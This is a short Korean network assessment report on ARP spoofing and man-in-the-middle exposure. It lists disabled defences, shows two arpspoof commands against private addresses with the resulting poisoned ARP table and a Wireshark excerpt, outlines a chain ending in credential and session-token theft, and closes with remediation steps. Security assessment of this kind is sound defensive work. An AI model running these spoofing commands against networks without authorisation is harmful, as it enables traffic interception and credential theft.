네트워크 장비 진단 - ARP Spoofing/MITM 진단
진단 시나리오
ARP Spoofing 및 중간자 공격 가능성 진단
점검 결과
| 방어기법 | 상태 | 평가 |
|---|
| Dynamic ARP Inspection | 비활성화 | 위험! |
| ARP Snooping | 비활성화 | 위험! |
| Static ARP 설정 | 없음 | 위험! |
| DHCP Snooping | 비활성화 | 위험! |
공격 시나리오
[Arpspoof 공격 시뮬레이션]
$ arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
[게이트웨이로부터의 ARP 응답을 가로챔]
$ arpspoof -i eth0 -t 192.168.1.1 192.168.1.100
[클라이언트로부터의 ARP 응답을 가로챔]
[결과]
192.168.1.100의 ARP 테이블:
- 192.168.1.1은 aa:bb:cc:dd:ee:01이 아니라
공격자 MAC(aa:bb:cc:dd:ee:ff)로 매핑됨
[MITM 공격 사슬]
1. ARP Spoofing으로 트래픽 리다이렉트
2. mitmproxy/Burp Suite로 트래픽 캡처
3. 자격증명/세션 토큰 탈취
4. 통신 내용 수정 가능
[Wireshark 캡처]
ARP, Request who-has 192.168.1.1 tell 192.168.1.100
ARP, Reply 192.168.1.1 is-at aa:bb:cc:dd:ee:ff (위조)
조치 가이드
- Dynamic ARP Inspection 활성화: DHCP Snooping 필수 선행
- 정적 ARP 엔트리 설정: 중요 시스템은 정적 설정
- DHCP Snooping 활성화: DAI의 기반
- 암호화 통신 강제: HTTPS, SSH 등